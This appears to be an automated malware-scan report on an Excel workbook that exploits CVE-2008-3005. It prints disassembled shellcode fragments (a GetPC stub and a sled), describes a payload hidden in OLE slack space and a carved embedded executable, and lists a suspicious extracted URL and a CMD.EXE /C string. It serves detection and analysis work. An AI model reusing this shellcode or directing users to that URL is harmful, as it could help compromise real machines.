Verdict: MALICIOUS (risk score 342)

Heuristics (9)
- Excel Index Array exploit, CVE-2008-3005 (critical; CVE likely; rule CVE_2008_3005): Legacy Excel workbook has the CVE-2008-3005 exploit shape: a compact BIFF8 FORMAT-index cluster paired with a normal XF table and a large unallocated OLE slack region used to stage the payload. The FORMAT pattern alone is not sufficient, so the rule requires the OLE slack payload-hiding context to keep false positives low.
- Embedded PE executable (critical; rule OLE_EMBEDDED_EXE): MZ/PE header found inside document — possible embedded executable.
- x86 GetPC stub, CALL $+5; POP EAX (high; rule SC_GETPC_CALL).
  Disassembly: x86 disassembly · validity: code (0.96) — 7/7 branch targets land on an instruction boundary (100% coherence)

```
00003901 e800000000 call 0x3906
00003906 58         pop eax
00003907 83c005     add eax, 5
0000390A c3         ret
0000390B f3a4       rep movsb byte ptr es:[edi], byte ptr [esi]
0000390D 33c0       xor eax, eax
0000390F 8bcb       mov ecx, ebx
00003911 f3aa       rep stosb byte ptr es:[edi], al
00003913 6a00       push 0
00003915 52         push edx
00003916 ffd5       call ebp
00003918 8b4f14     mov ecx, dword ptr [edi + 0x14]
0000391B 8b07       mov eax, dword ptr [edi]
0000391D 8bd0       mov edx, eax
0000391F 03d1       add edx, ecx
00003921 8b5f10     mov ebx, dword ptr [edi + 0x10]
00003924 03d9       add ebx, ecx
00003926 2bda       sub ebx, edx
00003928 8b6e18     mov ebp, dword ptr [esi + 0x18]
0000392B ff561c     call dword ptr [esi + 0x1c]
0000392E 8bd0       mov edx, eax
00003930 8b7710     mov esi, dword ptr [edi + 0x10]
00003933 8b3f       mov edi, dword ptr [edi]
00003935 ffe4       jmp esp
00003937 8b561c     mov edx, dword ptr [esi + 0x1c]
0000393A 83c203     add edx, 3
0000393D 52         push edx
0000393E 52         push edx
0000393F 52         push edx
00003940 52         push edx
00003941 6a00       push 0
00003943 6880000000 push 0x80
00003948 6a04       push 4
0000394A 6a00       push 0
0000394C 6a01       push 1
0000394E 68000000c0 push 0xc0000000
00003953 50         push eax
00003954 52         push edx
00003955 8d16       lea edx, [esi]
00003957 ff22       jmp dword ptr [edx]
00003959 8b5614     mov edx, dword ptr [esi + 0x14]
0000395C 8b461c     mov eax, dword ptr [esi + 0x1c]
0000395F 6a00       push 0
```
- Reference to CreateProcess API (high; rule SC_STR_CREATEPROCESS).
- Suspicious cmd.exe invocation with execution flag (high; rule SC_STR_CMD).
- OLE document has large unaccounted-for region (high; rule OLE_SLACK_ANOMALY): OLE file is 212,806 bytes but its declared streams total only 12,288 bytes — 200,518 bytes (94%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Suspicious extracted artifact (high; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- NOP-equivalent sled detected (medium; rule SC_NOP_EQUIV_SLED): Long run of 0x61 bytes.
  Disassembly: x86 disassembly · validity: uncertain (0.586) — 3/8 branch targets land on an instruction boundary (38% coherence)

```
000039F4 61             popal
000039F5 61             popal
000039F6 61             popal
000039F7 61             popal
000039F8 61             popal
000039F9 61             popal
000039FA 61             popal
000039FB 61             popal
000039FC 61             popal
000039FD 61             popal
000039FE 61             popal
000039FF 61             popal
00003A00 61             popal
00003A01 61             popal
00003A02 61             popal
00003A03 61             popal
00003A04 61             popal
00003A05 61             popal
00003A06 61             popal
00003A07 61             popal
00003A08 61             popal
00003A09 61             popal
00003A0A 61             popal
00003A0B 61             popal
00003A0C 61             popal
00003A0D 61             popal
00003A0E 61             popal
00003A0F 61             popal
00003A10 61             popal
00003A11 61             popal
00003A12 61             popal
00003A13 61             popal
00003A14 61             popal
00003A15 61             popal
00003A16 61             popal
00003A17 91             xchg ecx, eax
00003A18 61             popal
00003A19 61             popal
00003A1A 7e6f           jle 0x3a8b
00003A1C 6f             outsd dx, dword ptr [esi]
00003A1D dbd5           fcmovnbe st(0), st(5)
00003A1F 61             popal
00003A20 ac             lodsb al, byte ptr [esi]
00003A21 68d9402d60     push 0x602d40d9
00003A26 40             inc eax
00003A27 ac             lodsb al, byte ptr [esi]
00003A28 093512081141   or dword ptr [0x41110812], esi
00003A2E 0e             push cs
00003A2F 1313           adc edx, dword ptr [ebx]
00003A31 06             push es
00003A32 0c00           or al, 0
00003A34 02410f         add al, byte ptr [ecx + 0xf]
00003A37 000e           add byte ptr [esi], cl
00003A39 0f411504031341 cmovno edx, dword ptr [0x41130304]
00003A40 0f1408         unpcklps xmm1, xmmword ptr [eax]
00003A43 41             inc ecx
00003A44 41             inc ecx
00003A45 0f2e2541320e0c ucomiss xmm4, dword ptr [0xc0e3241]
00003A4C 0405           add al, 5
00003A4E 6c             insb byte ptr es:[edi], dx
00003A4F 4f             dec edi
00003A50 6b             .byte 0x6b
00003A51 6c             insb byte ptr es:[edi], dx
00003A52 61             popal
00003A53 45             inc ebp
```
- Embedded URL (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://www.tcm-mice.com.tw/frango (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| embedded_office_0000708a.exe | embedded-pe | Office MZ+PE at offset 0x708A | 183996 bytes |

SHA-256: 85d6ff5f9502893d6333ba9b0453ca3e5ba7ae6696e509e48f52048e66c018d5

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely
- Static shellcode analysis recovered command string(s): CMD.EXE /C